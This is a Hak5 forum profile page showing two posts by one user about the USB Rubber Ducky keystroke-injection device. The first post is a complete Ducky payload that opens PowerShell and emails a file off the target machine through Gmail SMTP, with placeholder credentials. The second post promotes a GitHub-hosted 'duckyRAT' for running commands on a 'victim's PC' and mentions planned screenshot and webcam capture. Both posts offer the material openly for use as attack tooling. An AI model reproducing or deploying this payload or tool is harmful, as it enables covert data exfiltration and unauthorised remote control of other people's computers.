Jump to content

untitled

Active Members
  • Posts

    13
  • Joined

  • Last visited

Posts posted by untitled

  1. Here's what I do, just a few Powershell commands:

    STRING powershell
    ENTER
    DELAY 500
    STRING $EmailTo = "EMAILTO@gmail.com"
    ENTER
    DELAY 50
    STRING $EmailFrom = "EMAILFROM@gmail.com" 
    ENTER
    DELAY 50
    STRING $Subject = "EMAILSUBJECT" 
    ENTER
    DELAY 50
    STRING $Body = "EMAILBODY" 
    ENTER
    DELAY 50
    STRING $SMTPServer = "smtp.gmail.com" 
    ENTER
    DELAY 50
    STRING $filenameAndPath = "ATTATCHMENT.txt" 
    ENTER
    DELAY 50
    STRING $SMTPMessage = New-Object System.Net.Mail.MailMessage($EmailFrom,$EmailTo,$Subject,$Body) 
    ENTER
    DELAY 50
    STRING $attachment = New-Object System.Net.Mail.Attachment($filenameAndPath) 
    ENTER
    DELAY 50
    STRING $SMTPMessage.Attachments.Add($attachment) 
    ENTER
    DELAY 50
    STRING $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 
    ENTER
    DELAY 50
    STRING $SMTPClient.EnableSsl = $true 
    ENTER
    DELAY 50
    STRING $SMTPClient.Credentials = New-Object System.Net.NetworkCredential("YOUREMAIL@gmail.com", "YOUR EMAIL PASSWORD OR 14 DIGIT AUTH CODE"); 
    ENTER
    DELAY 50
    STRING $SMTPClient.Send($SMTPMessage)
    ENTER
    DELAY 2000
    STRING exit
    ENTER

     

  2. Hi, Hak5Forums!

    I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky.

    Here is the GitHub Link: https://github.com/untitledusername/duckyRAT

    GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki

    Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC.  If you have any questions I'll gladly answer them down below.

    Edit:  I'm working on adding features to take screenshots of victim's desktop, webcam, etc.

    Thanks everybody, enjoy!

    - untitled ❤

×
×
  • Create New...